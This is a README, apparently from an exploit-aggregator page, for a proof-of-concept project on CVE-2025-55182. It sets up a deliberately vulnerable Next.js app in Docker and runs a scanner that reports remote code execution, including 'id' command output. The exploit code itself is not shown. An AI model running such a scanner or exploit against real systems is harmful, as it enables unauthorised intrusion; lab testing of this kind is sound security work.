Share
## https://sploitus.com/exploit?id=6C05F46F-1133-5AE8-9F47-922DACFB7832
# CVE-2025-55182 - PoC & Stand
## ๐ Quick Start
### 1. Deploy Vulnerable Stand
```bash
cd Stand
docker compose up --build
The vulnerable app runs at: http://localhost:3011
2. Run the Safe PoC Scanner
bash
cd PoC/src
poetry install
poetry run python scanner.py http://localhost:3011
โ
Expected PoC Output
text
[*] Scanning target: http://localhost:3011
[+] VULNERABLE! RCE confirmed.
[+] Command output (id): uid=1001(nextjs)...
[+] Network test (ping) SUCCESSFUL.
[*] Results saved to 'result.txt'.
File result.txt will contain: [{"ip": "http://localhost:3011", "vuln": true}]
๐ Project Structure
PoC/ โ Safe scanner (Dockerfile, scanner.py)
Stand/ โ Vulnerable Next.js app (Docker)
README.md โ This file